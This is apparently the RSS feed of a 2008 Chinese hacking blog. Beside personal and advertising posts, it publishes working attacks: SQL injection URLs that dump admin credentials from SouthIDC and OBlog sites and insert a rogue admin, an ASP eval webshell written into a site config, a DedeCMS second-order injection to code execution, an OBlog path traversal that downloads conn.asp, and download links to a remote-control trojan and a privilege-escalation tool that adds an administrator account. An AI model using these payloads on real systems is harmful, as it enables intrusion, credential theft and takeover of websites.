XoL-!'s Security Blog http://www.tsbct.com/ 没有做不到的事,只有不想做的事,多尝试就会找到你想要的答案。 Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved. SaBlog-X Version 1.6 Build 20080806 Thu, 20 Nov 2008 06:10:23 +0000 30 http://www.tsbct.com/?action=show&id=11 发个0day 南方数据企业最新注入漏洞 XoL-! 原创作品,转载请注明来源,谢谢。
**************************
By:XoL-!
http://www.tsbct.com
**************************

发现日期:

2008-09-25
影响版本: v10.0 v11.0

Exploit:

http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

获取shell方法:

 在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp

]]> http://www.tsbct.com/?action=show&id=11 技术文档 2008-09-25 03:39 http://www.tsbct.com/?action=show&id=10 招聘熟悉反汇编/分析程序 XoL-! 条件:

1.熟悉反汇编.

2.熟悉程序分析..

3.人品正直.有团队意识..

待遇:

面议..

联系方式:

QQ:274417

E-mail:tsbct@qq.com

]]> http://www.tsbct.com/?action=show&id=10 生活随笔 2008-08-06 19:32 http://www.tsbct.com/?action=show&id=9 最近太忙,域名到期了,都忘记续费了 XoL-! 最近太忙,域名到期了,都忘记续费了..

昨晚刚刚续费..哦耶..今天可以使用了...

]]> http://www.tsbct.com/?action=show&id=9 生活随笔 2008-07-22 18:32 http://www.tsbct.com/?action=show&id=8 PCSHARE VIP 2005源代码 XoL-! vippcshare.rar

]]> http://www.tsbct.com/?action=show&id=8 资源共享 2008-05-21 20:58 http://www.tsbct.com/?action=show&id=7 Dedecms getip()的漏洞利用 XoL-! author: superhei
team:http://www.ph4nt0m.org
blog:http://superhei.blogbus.com

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:

在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php 

PHP代码
  1. function FushCache($mid=0)   
  2.  {   
  3.      if(emptyempty($mid)) $mid = $this->M_ID;   
  4.      $dsql = new DedeSql();   
  5.         $row = $dsql->GetOne("Select ID,userid,pwd,type,uname,membertype,money,uptime,exptime,scores,newpm From #@__member where ID='{$mid}' ");   
  6.         if(is_array($row))   
  7.         {   
  8.           $scrow = $dsql->GetOne("Select titles From #@__scores where integral<={$row['scores']} order by integral desc");   
  9.           $row['honor'] = $scrow['titles'];   
  10.         }   
  11.         if(is_array($row)) return WriteUserInfos($mid,$row); //这里   
  12.         else return '';   
  13.  }  

WriteUserInfos()的代码:

//写入用户的会话信息

PHP代码
  1. function WriteUserInfos($uid,$row)   
  2. {   
  3.    $tpath = ceil($uid/5000);   
  4.    $ndir = dirname(__FILE__)."/cache/user/$tpath/";   
  5.    if(!is_dir($ndir)){   
  6.         mkdir($ndir,0777);   
  7.         chmod($ndir,0777);   
  8.    }   
  9.    $userfile = $ndir.$uid.'.php';   
  10.    $infos = "<"."?php\r\n";   
  11.    $infos .= "\$cfg_userinfos['wtime'] = '".mytime()."';\r\n";   
  12.    foreach($row as $k=>$v){   
  13.         if(ereg('[^0-9]',$k)){   
  14.              $v = str_replace("'","\\'",$v); //这个是利用的关键 :)   
  15.              $v = ereg_replace("(<\?|\?>)","",$v);   
  16.              $infos .= "\$cfg_userinfos['{$k}'] = '{$v}';\r\n";   
  17.         }   
  18.    }   
  19.    $infos .= "\r\n?".">";   
  20.    @$fp = fopen($userfile,'w');   
  21.    @flock($fp);   
  22.    @fwrite($fp,$infos);   
  23.    @fclose($fp);   
  24.    return $infos;   
  25. }  

我们构造

PHP代码
  1. $ipp="121.11.11.1',uname=0x68656967655C273B706870696E666F28293B2F2F,uptime='1";   
  2.   
  3. mysql> select 0x68656967655C273B706870696E666F28293B2F2F;   
  4. +--------------------------------------------+   
  5. | 0x68656967655C273B706870696E666F28293B2F2F |   
  6. +--------------------------------------------+   
  7. | heige\';phpinfo();//                       |   
  8. +--------------------------------------------+   
  9. 1 row in set (0.00 sec)  

利用流程:

A:

PHP代码
  1. else//成功登录   
  2. //$ipp="121.11.11.1',uname=0x68656967655C273B706870696E666F28293B2F2F,uptime='1";   
  3.     $dsql->ExecuteNoneQuery("update #@__member set logintime='".mytime()."',loginip='".$ipp."' where ID='{$row['ID']}';");  

B:FushCache()

PHP代码
  1. $row = $dsql->GetOne("Select ID,userid,pwd,type,uname,membertype,money,uptime,exptime,scores,newpm From #@__member where ID='{$mid}' ");  

C:WriteUserInfos()

PHP代码
  1. heige\';phpinfo();// ---str_replace-->heige\\';phpinfo();//---fwrite--->heige\\';phpinfo();//  
  2.  
  3. ===>$cfg_userinfos['uname'] = 'heige\\';phpinfo();//'; 完美闭和前面的' :)  

其中str_replace的部分相当于代码:

PHP代码
  1. <?php   
  2. $v="heige\';phpinfo();//";   
  3. $v = str_replace("'","\\'",$v);   
  4. print $v;   
  5. ?>  

整个过程其实就是一个很完整的"二次攻击",而str_replace("'","\\'",$v);起了关键性的作用 :)

[因为这个漏洞当我pc上有那么段时间了,这个文章很多都是凭记忆写的,可能有错误,有兴趣的同学可以自己跟一下。]

]]> http://www.tsbct.com/?action=show&id=7 技术文档 2008-05-18 18:13 http://www.tsbct.com/?action=show&id=6 发布两个非常2B的攻击程序 XoL-! 风云攻击程序8.0

生成器密码:fengyun

风云攻击程序9.0

 

下载地址

fy8.rar

fy9.rar

 

]]> http://www.tsbct.com/?action=show&id=6 资源共享 2008-05-14 10:33 http://www.tsbct.com/?action=show&id=5 真的补了吗 Oblog漏洞重现 XoL-! http://www.target.com/attachment.asp?path=./conn.asp这样已经无法下载文件,我从官方下载了最新版本4.60 Final Build080403 Access(集成了attachment.asp补丁),发现修改后的代码并不能解决问题,OBlog任意文件下载漏洞依然存在。具体看attachment.asp代码。
########################################################################
关键部分:

ASP/Visual Basic代码
  1. Path = Trim(Request("path")) '获取用户提交的路径   
  2. FileID = Trim(Request("FileID"))   
  3. If FileID ="" And Path = "" Then  
  4.         Response.Write "参数不足"  
  5.         Response.End  
  6. End If  
  7. ...   
  8. If CheckDownLoad  Or 1= 1Then   
  9.         If Path = "" Then  
  10.                 set rs = Server.CreateObject("ADODB.RecordSet")   
  11.                 link_database   
  12.                 SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "CLng(FileID))   
  13.                 rs.open sql,conn,1,3   
  14.                 If Not rs.Eof Then  
  15.                         uid = rs(1)   
  16.                         file_ext = rs(2)   
  17.                         rs("ViewNum") = rs("ViewNum") + 1   
  18.                         rs.Update   
  19.                         downloadFile Server.MapPath(rs(0)),0   
  20.                 Else  
  21.                         Response.Status=404   
  22.                         Response.Write "该附件不存在!"  
  23.                 End If  
  24.                 rs.Close   
  25.                 Set rs = Nothing  
  26.         Else  
  27.                 If InStr(path,Oblog.CacheConfig(56)) > 0 Then 'Tr4c3标注:注意这里,仅仅判断用户提交的路径是否包含UploadFiles,为真则调用downloadfile函数下载文件   
  28.                         downloadFile Server.MapPath(Path),1   
  29.                 End if   
  30.         End If  
  31. Else  
  32.         '如果附件为图片的话,当权限检验无法通过则调用一默认图片,防止<img>标记无法调用,影响显示效果   
  33.         If Path = "" Then  
  34.                 Response.Status=403   
  35.                 Response.Write ShowDownErr   
  36.                 Response.End  
  37.         Else  
  38.                 downloadFile Server.MapPath(blogdir"images/oblog_powered.gif"),1   
  39.         End if   
  40. End if   
  41.   
  42. Set oblog = Nothing  
  43.   
  44. Sub downloadFile(strFile,stype)   
  45.         On Error Resume Next  
  46.         Server.ScriptTimeOut=9999999   
  47.         Dim S,fso,f,intFilelength,strFilename   
  48.         strFilename = strFile   
  49.         Response.Clear   
  50.         Set s = Server.CreateObject(oblog.CacheCompont(2))   
  51.         s.Open   
  52.         s.Type = 1   
  53.         Set fso = Server.CreateObject(oblog.CacheCompont(1))   
  54.         If Not fso.FileExists(strFilename) Then  
  55.                 If stype = 0 Then  
  56.                         Response.Status=404   
  57.                         Response.Write "该附件已经被删除!"  
  58.                         Exit Sub  
  59.                 Else  
  60.                         strFilename = Server.MapPath(blogdir"images/nopic.gif")   
  61.                 End if   
  62.         End If  
  63.         Set f = fso.GetFile(strFilename)   
  64.         intFilelength = f.size   
  65.         s.LoadFromFile(strFilename)   
  66.         If Err Then  
  67.                  Response.Write("<h1>错误: </h1>" & Err.Description & "<p>")   
  68.                 Response.End  
  69.         End If  
  70.         Set fso=Nothing  
  71.         Dim Data   
  72.         Data=s.Read   
  73.         s.Close   
  74.         Set s=Nothing  
  75.         Dim ContentType   
  76.         select Case LCase(Right(strFile, 4))   
  77.         Case ".asp",".mdb",".config",".js" 'Tr4c3标注:再看这里,想起来什么来了?对了,前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com/post/306.html],利用方法也相似,神奇的"."又派上用场了。   
  78.                 Exit Sub  
  79.         Case ".asf"  
  80.                 ContentType = "video/x-ms-asf"  
  81.         Case ".avi"  
  82.                 ContentType = "video/avi"  
  83.         Case ".doc"  
  84.                 ContentType = "application/msword"  
  85.         Case ".zip"  
  86.                 ContentType = "application/zip"  
  87.         Case ".xls"  
  88.                 ContentType = "application/vnd.ms-excel"  
  89.         Case ".gif"  
  90.                 ContentType = "image/gif"  
  91.         Case ".jpg""jpeg"  
  92.                 ContentType = "image/jpeg"  
  93.         Case ".wav"  
  94.                 ContentType = "audio/wav"  
  95.         Case ".mp3"  
  96.                 ContentType = "audio/mpeg3"  
  97.         Case ".mpg""mpeg"  
  98.                 ContentType = "video/mpeg"  
  99.         Case ".rtf"  
  100.                 ContentType = "application/rtf"  
  101.         Case ".htm""html"  
  102.                 ContentType = "text/html"  
  103.         Case ".txt"  
  104.                 ContentType = "text/plain"  
  105.         Case Else  
  106.                 ContentType = "application/octet-stream"  
  107.         End select   
  108.         If Response.IsClientConnected Then  
  109.                 If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then  
  110.                         Response.AddHeader "Content-Disposition""attachment; filename=" & f.name   
  111.                 End If  
  112.                 Response.AddHeader "Content-Length", intFilelength   
  113.                 Response.CharSet = "UTF-8"  
  114.                 Response.ContentType = ContentType   
  115.                 Response.BinaryWrite Data   
  116.                 Response.Flush   
  117.                 Response.Clear()   
  118.         End If  
  119. End Sub  

########################################################################
利用方法:
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
修补建议:
等待官方发布新的补丁程序。
########################################################################
临时解决办法:
将attachment.asp第5行 Path = Trim(Request("path")) 改成 Path = Replace(Trim(Request("path")),"..","")
########################################################################

]]> http://www.tsbct.com/?action=show&id=5 技术文档 2008-05-01 21:48 http://www.tsbct.com/?action=show&id=4 ms08025 XoL-! ms08025

 

Example: 

ms08025.exe  "net user tsbct tsbct /add & net localgroup administrators tsbct /add"

ms08025.rar

]]> http://www.tsbct.com/?action=show&id=4 资源共享 2008-04-28 11:03 http://www.tsbct.com/?action=show&id=3 坐骑首次亮相!!! XoL-! 大小: 59.48 K 尺寸: 500 x 375 浏览: 9 次点击打开新窗口浏览全图

大小: 64.18 K 尺寸: 500 x 375 浏览: 8 次点击打开新窗口浏览全图

大小: 69.54 K 尺寸: 500 x 375 浏览: 5 次点击打开新窗口浏览全图

大小: 64.73 K 尺寸: 500 x 375 浏览: 7 次点击打开新窗口浏览全图

大小: 65.84 K 尺寸: 500 x 375 浏览: 2 次点击打开新窗口浏览全图

大小: 35.97 K 尺寸: 500 x 375 浏览: 2 次点击打开新窗口浏览全图

大小: 66.13 K 尺寸: 500 x 375 浏览: 1 次点击打开新窗口浏览全图

]]> http://www.tsbct.com/?action=show&id=3 生活随笔 2008-04-28 08:52 http://www.tsbct.com/?action=show&id=2 OBlog Sql Injection Vulnerability XoL-! 官方已经修正该漏洞。

     --==+=================== www.nspcn.org =================+==--
--==+                OBlog (tags.asp) Remote SQL Injection Exploit             +==--
--==+====================================================================================+==--

#Author: Whytt & Tr4c3[at]126[dot]com 
#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt
#漏洞文件tags.asp
#影响版本:
  3.13-20060429 [access & mssql]
  4.02-20070112 [access & mssql]
  4.50 Final Build0619 [access & mssql]
  4.60 Final Build0921 [access & mssql]
  4.60 Final Build1107 [access & mssql]
#漏洞原因:变量tagid未经过滤传值,带入sql执行,导致注入产生。
#修补方法:检查用户提交的tagid,只允许是数字。
  例如:
    将iTagId = Trim(Request.Querystring("tagid"))改成iTagId = Clng(Trim(Request.Querystring("tagid")))


[+++]
这个地方的注射是去年whytt在读OBLOG 4.5的时候发现的,当时没仔细看,只是听他说适用于mssql版,今天在搞一个站的时侯遇见了Oblog 4.60 Final Build1107 (Access),百般无奈又去看了看那个放了N久的"mssql注入点",这一看不要紧,扩展成了access和mssql通杀。
[+++]
再来啰嗦一下代码的问题tags.asp行15-36

 

ASP/Visual Basic代码
  1. sType = LCase(Trim(Request.Querystring("t")))   
  2. iTagId = Trim(Request.Querystring("tagid")) '这个地方没过滤,在36行处传值给函数GetUsersByTag   
  3. iUserId = Trim(Request.Querystring("userid"))   
  4. sKeyword= Trim(Request("keyword"))   
  5. sAll=Trim(Request.Querystring)   
  6. If sAll & sKeyword="" Then sType="hottags"  
  7.   
  8. Call link_database()   
  9.   
  10. select Case sType   
  11.   Case "hottags"  
  12.     sTitle="最热门的100个" & P_TAGS_DESC   
  13.     sContent=Tags_Hottags()   
  14.   Case "cloud"  
  15.     sTitle=P_TAGS_DESC & "云图"  
  16.     sContent=Tags_SystemTags(1)   
  17.   Case "list"  
  18.     sTitle=P_TAGS_DESC & "列表"  
  19.     sContent=Tags_SystemTags(0)   
  20.   Case "user"  
  21.     sTitle=P_TAGS_DESC & "用户"  
  22.     sContent=GetUsersByTag(iTagId)  

函数GetUsersByTag的原型在文件Inc_Tags.asp行320-338

 

ASP/Visual Basic代码
  1. Function GetUsersByTag(byval sTagId)   
  2.   Dim rst,sSql,sContent   
  3.   Set rst = Server.CreateObject("Adodb.Recordset")   
  4.   sSql = "select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=" & sTagId & " Group By UserId) a,oblog_user b Where a.Userid=b.UserId"  
  5.   rst.Open sSql,conn,1,1   
  6.   If rst.Eof Then  
  7.     sContent="没有符合条件的用户"  
  8.     rst.Close   
  9.     Set rst = Nothing  
  10.   End If  
  11.   i=0   
  12.   Do While Not rst.Eof   
  13.     sContent=sContent & "<a href="& blogurl& rst("user_dir") & "/" & rst("user_folder")"/index." &f_ext" target=_blank>" & rst("userName") & "</a><br/>"  
  14.     rst.movenext   
  15.   Loop  
  16.   rst.Close   
  17.   Set rst = Nothing  
  18.   GetUsersByTag=sContent   
  19. End Function  

之所以当初whytt说只适用于mssql,是当时没想起来如何无错闭合,仔细想想原来这么简单.

 

SQL代码
  1. select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId  

union前后是一个语句当然不会出错了,但是

 

SQL代码
  1. select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 '为了返回union后面的语句信息,union前面的限定条件加一个and  1=2 [逻辑假]  

这样就报错了,利用起来也是很简单的,打开http://www.target.com/oblog/tags.asp,点开一个有返回内容的连接(注意是有返回内容,而不是标题,当然不怕麻烦也可以自己注册发表文章和标签),看tagid,如图1
大小: 73.05 K 尺寸: 500 x 259 浏览: 5 次点击打开新窗口浏览全图

这里我们看到的是1。组合下url就是

 

URL
  1. http://www.target.com/oblog/tags.asp?t=userkeyword=tracetagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1  

放在nbsi里手动加入表oblog_admin,开始你的注射...

如果你比较懒,就用union查询吧

 

URL
  1. Access:   
  2. http://www.target.com/oblog/tags.asp?t=userkeyword=tracetagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username%2bchr(124)%2bpassword,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 and 1=2  
  3. MSSQL:   
  4. http://www.target.com/oblog/tags.asp?t=userkeyword=tracetagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username%2bchar(124)%2bpassword,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 and 1=2  

如图2

大小: 70.54 K 尺寸: 500 x 282 浏览: 2 次点击打开新窗口浏览全图

 

URL
  1. 暴管理员账号密码       
  2. http://www.xxx.com/oblog/tags.asp?t=userkeyword=tracetagid=1%20Group%20By%20UserId)%20a,oblog_user%20b%20Where%20a.Userid=b.UserId%20and%22201=2%20union%20select%20username%2bchar(124)%2bpassword,2,3%20From%20Oblog_admin%20union%20select%20Top%20100%20b.userName,b.user_dir,b.user_folder%20From%20(select%20Userid%20From%20oblog_usertags%20Where%2220Tagid=2%20and%22201=2       
  3.       
  4. 暴后台       
  5. http://www.xxx.com/oblog/tags.asp?t=userkeyword=tracetagid=2 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union all select querystrings,2,3 From Oblog_sysLog;select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=2 and 1=2      
  6.       
  7. 加管理员后台       
  8. http://www.xxx.com/oblog/Tags.asp?t=userkeyword=ttagid=2%20Group%20By%20UserId)%20a,oblog_user%20b%20Where%20a.Userid=b.UserId;insert into Oblog_admin(username,password) values('xx','49ba59abbe56e057');update [oblog_admin] set roleid = 0 where username='xx'--     

附利用动画
http://www.tr4c3.com/upload/oblog.rar

intext:"Copyright by oblog.cn"#google.cn

看版本http://www.target.com/oblog/ver.asp

]]> http://www.tsbct.com/?action=show&id=2 技术文档 2008-04-28 08:46 http://www.tsbct.com/?action=show&id=1 博客又回来啦.... XoL-! 首先感谢兄弟小狼赞助俺空间...

希望这次博客继续延续下去....

各位兄弟做连接的QQ找我哈...

XoL-!'s Security Blog

http://www.tsbct.com/

另外广告下

域名注册,虚拟机主,服务器出租

需要以上服务可联系我QQ:274417

]]> http://www.tsbct.com/?action=show&id=1 生活随笔 2008-04-28 08:43